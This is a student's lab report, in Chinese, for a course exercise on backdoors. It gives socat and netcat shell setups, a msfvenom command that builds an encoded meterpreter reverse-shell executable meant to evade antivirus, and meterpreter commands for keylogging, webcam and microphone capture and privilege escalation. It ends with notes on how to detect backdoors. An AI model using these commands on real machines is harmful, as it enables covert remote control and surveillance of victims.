20155204 王昊《網絡對抗技術》EXP2 後門原理與實踐

20155204 王昊《網絡對抗技術》EXP2 後門原理與實踐

1、實驗內容

準備工做（試用ncat、socat）

1. 使用netcat獲取主機操做Shell，cron啓動。

• 明確目標：要利用crontab命令從Windows得到linux的shell。
• 在Windows下監聽自定端口。
• 用man命令查詢crontab命令用法
• 使用crontab -e指令編輯定時任務。（前面的數字是你想要讓他在每一個小時的某分鐘運行）
• 等到本身設定的分鐘數後，獲得了linux的shell。
  

2. 使用socat獲取主機操做Shell, 任務計劃啓動。

• Windows下搜索任務計劃工具，打開後建立任務（自定義名稱），而後新建觸發器。
• 程序和腳本選擇socat.exe路徑，添加參數要寫tcp-listen:5204 exec:cmd.exe,pty,stderr，用來將cmd.exe綁定到端口5204，同時把cmd.exe的stderr重定向到stdout上。
• 建立完成後，再次進入系統（能夠經過鎖定計算機來完成），發現任務已經在運行。
• 在linux環境下輸入指令socat - tcp:172.30.4.71:5204，這裏的第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的5204端口
  

3.使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

• 選用難一點的指令

msfvenom -p windows/meterpreter/reverse_tcp -x ./20155204.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1 LPORT=5204 -f exe > 20155204_backdoor.exe

• 參數說明：

-p 使用的payload。payload翻譯爲有效載荷，就是被運輸有東西。這裏windows/meterpreter/reverse_tcp就是一段shellcode.
    -x 使用的可執行文件模板，payload(shellcode)就寫入到這個可執行文件中。
    -e 使用的編碼器，用於對shellcode變形，爲了免殺。
    -i 編碼器的迭代次數。如上即便用該編碼器編碼5次。
    -b badchar是payload中須要去除的字符。
    LHOST 是反彈回連的IP
    LPORT 是回連的端口
    -f 生成文件的類型
    > 輸出到哪一個文件

• 生成後門程序後，能夠經過nc傳到Windows下，利用vmware的加強功能能夠直接把文件拖過去（此過程殺毒軟件會報警，關掉它或者忽略）
• 在Kali上使用msfconsole指令進入msf控制檯，使用監聽模塊，設置payload，設置反彈回連的IP和端口。

• 這裏必定注意理解反彈端口的意義，以及LHOST的意義，不要像我同樣，把LHOST一直設成了被攻擊主機的IP。。。（下面這個是錯誤圖片）
  

• 設置好後能夠開始監聽，用exploit
• 在Windows裏雙擊運行後門程序

• linux便得到了遠程控制的shell
  

4. 使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

• 使用record_mic指令能夠截獲一段音頻。
• 使用webcam_snap指令可使用攝像頭進行拍照。
• 使用webcam_stream指令可使用攝像頭進行錄像。
• 使用screenshot指令能夠進行截屏。
• 使用keyscan_start指令開始記錄下擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄。
• 先使用getuid指令查看當前用戶，使用getsystem指令進行提權。（這裏提一下，我周圍用win7虛擬機的同窗好像都會出錯，可是我用的是PC自己的系統，直接就行了。同窗的問題我也不會解決。。）
  
  
  

2、基礎問題回答

1. 例舉你能想到的一個後門進入到你係統中的可能方式？

• 答：在Unix裏,login程序一般用來對telnet來的用戶進行口令驗證. 入侵者獲取login.c的原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令. 若是用戶敲入後門口令,它將忽視管理員設置的口令讓你長驅直入. 這將容許入侵者進入任何賬號,甚至是root.因爲後門口令是在用戶真實登陸並被日誌記錄到utmp和wtmp前產生一個訪問的, 因此入侵者能夠登陸獲取shell卻不會暴露該賬號。

1. 例舉你知道的後門如何啓動起來(win及linux)的方式？

• 答：1．操做系統自帶服務； 2．網絡協議捆綁； 3．軟件編寫者製做； 4．漏洞攻擊後放置； 5．社會工程學等相關方式。

1. Meterpreter有哪些給你映像深入的功能？

• 答：錄屏、錄按鍵、提高權限都很強， 這種功能一旦落入壞人手裏就很危險了。。。

1. 如何發現本身有系統有沒有被安裝後門？

• 答：

1. 檢測網絡鏈接，可使用Windows自帶的網絡命令來看看誰在鏈接你的計算機。具體的命令格式是:netstat -an 這個命令能看到全部和本地計算機創建鏈接的IP，它包含四個部分——proto(鏈接方式)、local address(本地鏈接地址)、foreign address(和本地創建鏈接的地址)、state(當前端口狀態)。經過這個命令的詳細信息，咱們就能夠徹底監控計算機上的鏈接，從而達到控制計算機的目的。
   2.檢查帳戶，先在命令行下輸入net user，查看計算機上有些什麼用戶，而後再使用「net user+用戶名」查看這個用戶是屬於什麼權限的，通常除了Administrator是administrators組的，其餘都不是!若是你發現一個系統內置的用戶是屬於administrators組的，那幾乎確定你被入侵了，並且別人在你的計算機上克隆了帳戶。

3、實驗總結與體會

此次實驗讓我感覺到了本身系統的安全性，在黑客面前就想他們口中的肉雞同樣，這讓我更加認識到了信息安全的重要性。